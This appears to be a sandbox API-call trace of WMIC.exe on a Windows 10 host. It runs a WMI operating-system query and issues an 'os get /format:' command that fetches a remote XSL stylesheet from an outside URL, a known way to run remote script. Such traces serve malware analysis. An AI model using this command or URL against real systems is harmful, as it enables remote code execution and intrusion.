	[0050.784] lstrlenW (lpString="X2VS1CUM") returned 8
	[0050.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="", cchCount2=0) returned 3
	[0050.784] lstrlenW (lpString="X2VS1CUM") returned 8
	[0050.784] lstrlenW (lpString="X2VS1CUM") returned 8
	[0050.784] GetCurrentThreadId () returned 0xdf0
	[0050.784] GetCurrentProcess () returned 0xffffffffffffffff
	[0050.784] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x350027f4f0 | out: TokenHandle=0x350027f4f0*=0x29c) returned 1
	[0050.784] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x350027f4e8 | out: TokenInformation=0x0, ReturnLength=0x350027f4e8) returned 0
	[0050.784] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x233e3710f20, TokenInformationLength=0x40, ReturnLength=0x350027f4e8 | out: TokenInformation=0x233e3710f20, ReturnLength=0x350027f4e8) returned 1
	[0050.784] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x233e3710f20*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=-500686573, Attributes=0x80001500))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0050.784] CloseHandle (hObject=0x29c) returned 1
	[0050.784] lstrlenW (lpString="GET") returned 3
	[0050.784] lstrlenW (lpString="get") returned 3
	[0050.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0050.786] lstrlenA (lpString="") returned 0
	[0050.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.786] lstrlenA (lpString="") returned 0
	[0050.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.786] lstrlenA (lpString="") returned 0
	[0050.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.787] lstrlenA (lpString="") returned 0
	[0050.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1d0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.787] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0050.787] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0050.787] wcstok (in: _String="Select * from Win32_OperatingSystem", _Delimiter=" ", _Context=0xfffffffffddea510 | out: _String="Select", _Context=0xfffffffffddea510) returned="Select"
	[0050.787] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="*"
	[0050.787] lstrlenW (lpString="FROM") returned 4
	[0050.787] lstrlenW (lpString="*") returned 1
	[0050.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0050.787] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="from"
	[0050.787] lstrlenW (lpString="FROM") returned 4
	[0050.787] lstrlenW (lpString="from") returned 4
	[0050.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0050.788] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="Win32_OperatingSystem"
	[0050.788] lstrlenA (lpString=" FROM ") returned 6
	[0050.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6c0020, cbMultiByte=-1, lpWideCharStr=0x233e37157f0, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
	[0050.788] lstrlenA (lpString="SELECT ") returned 7
	[0050.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6c0028, cbMultiByte=-1, lpWideCharStr=0x233e37156d0, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
	[0050.788] ??0CHString@@QEAA@XZ () returned 0x350027b3c0
	[0050.788] GetCurrentThreadId () returned 0xdf0
	[0050.788] CoCreateInstance (in: rclsid=0x7ff66e6c3548*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c3558*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x7ff66e6da8c0 | out: ppv=0x7ff66e6da8c0*=0x233e12eecb0) returned 0x0
	[0050.792] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.792] ??0CHString@@QEAA@XZ () returned 0x350027b3c0
	[0050.792] GetCurrentThreadId () returned 0xdf0
	[0050.792] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233e12241d0, strNetworkResource="\\\\X2VS1CUM\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da8d0 | out: ppNamespace=0x7ff66e6da8d0*=0x233e12920a0) returned 0x0
	[0050.798] CoSetProxyBlanket (pProxy=0x233e12920a0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0050.798] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.799] ??0CHString@@QEAA@XZ () returned 0x350027b2b8
	[0050.799] GetCurrentThreadId () returned 0xdf0
	[0050.799] ??0CHString@@QEAA@XZ () returned 0x350027b260
	[0050.799] GetCurrentThreadId () returned 0xdf0
	[0050.799] CoCreateInstanceEx (in: Clsid=0x7ff66e6c3528*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x350027b210 | out: pResults=((pIID=0x7ff66e6c3538*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x233e1274ba0, hr=0x0))) returned 0x0
	[0050.800] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.826] wcsstr (_Str="Win32_OperatingSystem", _SubStr="Win32_DiskDrive") returned 0x0
	[0050.929] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x233e12eecb0, lFlags=0, pObj=0x233e12e4710, uObjTextFormat=0x1, pCtx=0x233e1274ba0, strText=0x350027b2c0 | out: strText=0x350027b2c0*="<INSTANCE CLASSNAME=\"Win32_OperatingSystem\"><PROPERTY NAME=\"BootDevice\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>\\Device\\HarddiskVolume1</VALUE></PROPERTY><PROPERTY NAME=\"BuildNumber\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>10586</VALUE></PROPERTY><PROPERTY NAME=\"BuildType\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Multiprocessor Free</VALUE></PROPERTY><PROPERTY NAME=\"Caption\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro</VALUE></PROPERTY><PROPERTY NAME=\"CodeSet\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1252</VALUE></PROPERTY><PROPERTY NAME=\"CountryCode\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1</VALUE></PROPERTY><PROPERTY NAME=\"CreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_OperatingSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSCreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_ComputerSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSDVersion\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"string\"></PROPERTY><PROPERTY NAME=\"CSName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>X2VS1CUM</VALUE></PROPERTY><PROPERTY NAME=\"CurrentTimeZone\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"sint16\"><VALUE>120</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_32BitApplications\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Available\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Drivers\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_SupportPolicy\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"Debug\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"Description\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE></VALUE></PROPERTY><PROPERTY NAME=\"Distributed\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"EncryptionLevel\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>256</VALUE></PROPERTY><PROPERTY NAME=\"ForegroundApplicationBoost\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"FreePhysicalMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>1237524</VALUE></PROPERTY><PROPERTY NAME=\"FreeSpaceInPagingFiles\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>1179648</VALUE></PROPERTY><PROPERTY NAME=\"FreeVirtualMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>2501756</VALUE></PROPERTY><PROPERTY NAME=\"InstallDate\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"datetime\"><VALUE>20170802150607.000000+120</VALUE></PROPERTY><PROPERTY NAME=\"LargeSystemCache\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"LastBootUpTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626225658.765149+120</VALUE></PROPERTY><PROPERTY NAME=\"LocalDateTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626225906.657000+120</VALUE></PROPERTY><PROPERTY NAME=\"Locale\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>0409</VALUE></PROPERTY><PROPERTY NAME=\"Manufacturer\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Microsoft Corporation</VALUE></PROPERTY><PROPERTY NAME=\"MaxNumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>4294967295</VALUE></PROPERTY><PROPERTY NAME=\"MaxProcessMemorySize\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>137438953344</VALUE></PROPERTY><PROPERTY.ARRAY NAME=\"MUILanguages\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE.ARRAY><VALUE>en-US</VALUE></VALUE.ARRAY></PROPERTY.ARRAY><PROPERTY NAME=\"Name\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfLicensedUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"NumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>58</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"OperatingSystemSKU\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>48</VALUE></PROPERTY><PROPERTY NAME=\"Organization\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>NHaYZ2</VALUE></PROPERTY><PROPERTY NAME=\"OSArchitecture\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>64-bit</VALUE></PROPERTY><PROPERTY NAME=\"OSLanguage\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>1033</VALUE></PROPERTY><PROPERTY NAME=\"OSProductSuite\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>256</VALUE></PROPERTY><PROPERTY NAME=\"OSType\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint16\"><VALUE>18</VALUE></PROPERTY><PROPERTY NAME=\"OtherTypeDescription\" CLASSORIGIN=\"CIM_") returned 0x0
	[0051.083] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0051.084] ??0CHString@@QEAA@XZ () returned 0x350027f598
	[0051.084] ?Format@CHString@@QEAAXPEBGZZ () returned 0x233e3716aec
	[0051.084] ??1CHString@@QEAA@XZ () returned 0x1
	[0051.084] ??0CHString@@QEAA@XZ () returned 0x350027f550
	[0051.085] ?Format@CHString@@QEAAXPEBGZZ () returned 0x233e3716aec
	[0051.085] ??0CHString@@QEAA@XZ () returned 0x350027f540
	[0051.085] ??0CHString@@QEAA@XZ () returned 0x350027f4d0
	[0051.085] ?Format@CHString@@QEAAXPEBGZZ () returned 0x233e37120bc
	[0051.086] ??1CHString@@QEAA@XZ () returned 0x1
	[0051.086] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
	[0051.086] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0051.086] ??0CHString@@QEAA@XZ () returned 0x350027f4c0
	[0051.087] ?Format@CHString@@QEAAXPEBGZZ () returned 0x233e3716ebc
	[0051.087] ??1CHString@@QEAA@XZ () returned 0x1
	[0051.088] ??1CHString@@QEAA@XZ () returned 0x1
	[0051.088] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c
	[0051.089] _kbhit () returned 0x0
	[0051.316] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f598
	[0051.316] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x350027f598
	[0051.316] lstrlenW (lpString="LIST") returned 4
	[0051.316] lstrlenW (lpString="get") returned 3
	[0051.316] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
	[0051.316] lstrlenW (lpString="ASSOC") returned 5
	[0051.316] lstrlenW (lpString="get") returned 3
	[0051.316] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
	[0051.316] lstrlenW (lpString="GET") returned 3
	[0051.316] lstrlenW (lpString="get") returned 3
	[0051.316] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0051.316] GetCurrentThreadId () returned 0xdf0
	[0051.316] ??0CHString@@QEAA@XZ () returned 0x350027f3e0
	[0051.317] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x233e1a26f20, bstrXML="<COMMAND SEQUENCENUM=\"1\" ISSUEDFROM=\"X2VS1CUM\" STARTTIME=\"06-26-2018T22:59:05\" EVERYCOUNT=\"0\"><REQUEST><COMMANDLINE>  os get /format:&quot;https://itaxkenya.com/kra/tax_returns.xsl&quot; </COMMANDLINE><COMMANDLINECOMPONENTS><NODELIST><NODE>X2VS1CUM</NODE></NODELIST></COMMANDLINECOMPONENTS><CONTEXT><NAMESPACE>root\\cimv2</NAMESPACE><ROLE>root\\cli</ROLE><IMPLEVEL>IMPERSONATE</IMPLEVEL><AUTHLEVEL>PKTPRIVACY</AUTHLEVEL><LOCALE>ms_409</LOCALE><PRIVILEGES>ENABLE</PRIVILEGES><TRACE>OFF</TRACE><RECORD>N/A</RECORD><INTERACTIVE>OFF</INTERACTIVE><FAILFAST>OFF</FAILFAST><OUTPUT>STDOUT</OUTPUT><APPEND>STDOUT</APPEND><USER>N/A</USER><AGGREGATE>ON</AGGREGATE></CONTEXT></REQUEST><RESULTS NODE=\"X2VS1CUM\"><CIM><INSTANCE CLASSNAME=\"Win32_OperatingSystem\"><PROPERTY NAME=\"BootDevice\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>\\Device\\HarddiskVolume1</VALUE></PROPERTY><PROPERTY NAME=\"BuildNumber\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>10586</VALUE></PROPERTY><PROPERTY NAME=\"BuildType\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Multiprocessor Free</VALUE></PROPERTY><PROPERTY NAME=\"Caption\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro</VALUE></PROPERTY><PROPERTY NAME=\"CodeSet\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1252</VALUE></PROPERTY><PROPERTY NAME=\"CountryCode\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1</VALUE></PROPERTY><PROPERTY NAME=\"CreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_OperatingSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSCreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_ComputerSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSDVersion\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"string\"></PROPERTY><PROPERTY NAME=\"CSName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>X2VS1CUM</VALUE></PROPERTY><PROPERTY NAME=\"CurrentTimeZone\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"sint16\"><VALUE>120</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_32BitApplications\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Available\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Drivers\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_SupportPolicy\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"Debug\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"Description\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE></VALUE></PROPERTY><PROPERTY NAME=\"Distributed\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"EncryptionLevel\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>256</VALUE></PROPERTY><PROPERTY NAME=\"ForegroundApplicationBoost\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"FreePhysicalMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>1237524</VALUE></PROPERTY><PROPERTY NAME=\"FreeSpaceInPagingFiles\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>1179648</VALUE></PROPERTY><PROPERTY NAME=\"FreeVirtualMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>2501756</VALUE></PROPERTY><PROPERTY NAME=\"InstallDate\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"datetime\"><VALUE>20170802150607.000000+120</VALUE></PROPERTY><PROPERTY NAME=\"LargeSystemCache\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"LastBootUpTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626225658.765149+120</VALUE></PROPERTY><PROPERTY NAME=\"LocalDateTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626225906.657000+120</VALUE></PROPERTY><PROPERTY NAME=\"Locale\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>0409</VALUE></PROPERTY><PROPERTY NAME=\"Manufacturer\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Microsoft Corporation</VALUE></PROPERTY><PROPERTY NAME=\"MaxNumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>4294967295</VALUE></PROPERTY><PROPERTY NAME=\"MaxProcessMemorySize\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>137438953344</VALUE></PROPERTY><PROPERTY.ARRAY NAME=\"MUILanguages\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE.ARRAY><VALUE>en-US</VALUE></VALUE.ARRAY></PROPERTY.ARRAY><PROPERTY NAME=\"Name\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfLicensedUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"NumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>58</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAM", isSuccessful=0x350027f3d0 | out: isSuccessful=0x350027f3d0*=0xffff) returned 0x0
	[0051.319] ??0CHString@@QEAA@XZ () returned 0x350027f0d0
	[0051.319] GetCurrentThreadId () returned 0xdf0
	[0051.320] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x233e1a2e7b0, async=0) returned 0x0
	[0051.320] SysStringByteLen (bstr="https://itaxkenya.com/kra/tax_returns.xsl") returned 0x52
	[0053.794] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x350027c4e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
	[0053.795] _splitpath_s (in: _FullPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", _Drive=0x0, _DriveSize=0x0, _Dir=0x0, _DirSize=0x0, _Filename=0x350027c660, _FilenameSize=0x104, _Ext=0x0, _ExtSize=0x0 | out: _Drive=0x0, _Dir=0x0, _Filename="WMIC", _Ext=0x0) returned 0x0
	[0053.795] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x350027c648 | out: phkResult=0x350027c648*=0x0) returned 0x2
	[0053.804] GetVersion () returned 0x295a000a
	[0053.804] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffc17120000
	[0053.805] GetProcAddress (hModule=0x7ffc17120000, lpProcName="QueryProtectedPolicy") returned 0x7ffc145c02d0
	[0053.805] VirtualProtect (in: lpAddress=0x7ffbf61cf668, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x350027c790 | out: lpflOldProtect=0x350027c790*=0x2) returned 1
	[0053.805] VirtualProtect (in: lpAddress=0x7ffbf61cf668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x350027c790 | out: lpflOldProtect=0x350027c790*=0x4) returned 1
	[0053.807] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffbf68c0000
	[0053.926] GetProcAddress (hModule=0x7ffbf68c0000, lpProcName="AmsiInitialize") returned 0x7ffbf68c2260
	[0053.926] GetProcAddress (hModule=0x7ffbf68c0000, lpProcName="AmsiScanString") returned 0x7ffbf68c26b0
	[0053.927] AmsiInitialize () returned 0x80070103
	[0054.064] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027eb98 | out: phkResult=0x350027eb98*=0x538) returned 0x0
	[0054.064] RegQueryValueExA (in: hKey=0x538, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x350027eb90, lpData=0x350027eb88, lpcbData=0x350027eb80*=0x4 | out: lpType=0x350027eb90*=0x4, lpData=0x350027eb88*=0x1, lpcbData=0x350027eb80*=0x4) returned 0x0
	[0054.064] RegCloseKey (hKey=0x538) returned 0x0
	[0054.064] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffc14550000
	[0054.064] GetProcAddress (hModule=0x7ffc14550000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffc145af670
	[0054.064] GetProcAddress (hModule=0x7ffc14550000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffc14611540
	[0054.068] IsValidCodePage (CodePage=0x4e4) returned 1
	[0054.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
	[0054.084] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x350027efe0 | out: lpConsoleScreenBufferInfo=0x350027efe0) returned 1
	[0054.091] IsValidCodePage (CodePage=0x4e4) returned 1
	[0054.091] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350027ec48 | out: ppv=0x350027ec48*=0x233e121be18) returned 0x0
	[0054.092] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350027ed08 | out: ppv=0x350027ed08*=0x233e121be18) returned 0x0
	[0054.092] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350027ecd0 | out: ppv=0x350027ecd0*=0x233e121be18) returned 0x0
